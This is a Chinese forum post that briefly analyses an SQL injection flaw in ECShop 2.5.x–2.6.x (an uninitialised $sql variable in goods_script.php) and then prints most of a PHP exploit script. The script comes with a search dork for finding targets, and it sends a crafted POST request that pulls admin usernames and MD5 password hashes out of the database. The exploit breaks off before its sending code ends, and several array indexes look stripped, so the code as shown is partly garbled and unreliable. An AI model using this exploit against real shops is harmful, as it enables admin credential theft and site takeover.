ECShop 注射漏洞分析
影响2.5.x和2.6.x,其他版本未测试 <br />goods_script.php <br />44行: <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode4"> <br />if (empty($_GET['type'])) <br />{ <br />... <br />} <br />elseif ($_GET['type'] == 'collection') <br />{ <br />... <br />} <br />$sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10); <br />$res = $db->query($sql); <br /></div><br />$sql没有初始化,很明显的一个漏洞:) <br />EXP: <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode5"> <br />#!/usr/bin/php <br /><?php <br />print_r(' <br />+---------------------------------------------------------------------------+ <br />ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit <br />by puret_t <br />mail: puretot at gmail dot com <br />team: http://bbs.wolvez.org <br />dork: "Powered by ECShop" <br />+---------------------------------------------------------------------------+ <br />'); <br />/** <br />* works with register_globals = On <br />*/ <br />if ($argc < 3) { <br />print_r(' <br />+---------------------------------------------------------------------------+ <br />Usage: php '.$argv.' host path <br />host: target server (ip/hostname) <br />path: path to ecshop <br />Example: <br />php '.$argv.' localhost /ecshop/ <br />+---------------------------------------------------------------------------+ <br />'); <br />exit; <br />} <br />error_reporting(7); <br />ini_set('max_execution_time', 0); <br />$host = $argv; <br />$path = $argv; <br />$resp = send(); <br />preg_match('#href="([\S]+):({32})"#', $resp, $hash); <br />if ($hash) <br />exit("Expoilt Success!\nadmin:\t$hash\nPassword(md5):\t$hash\n"); <br />else <br />exit("Exploit Failed!\n"); <br />function send() <br />{ <br />global $host, $path; <br />$cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#'; <br />$data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n"; <br />$data .= "Accept: */*\r\n"; <br />$data .= "Accept-Language: zh-cn\r\n"; <br />$data .= "Content-Type: application/x-www-form-urlencoded\r\n"; <br />$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; <br />$data .= "Host: $host\r\n"; <br />$data .= "Content-Length: ".strlen($cmd)."\r\n"; <br />$data .= "Connection: Close\r\n\r\n"; <br />$data .= $cmd; <br /></div>
頁:
[1]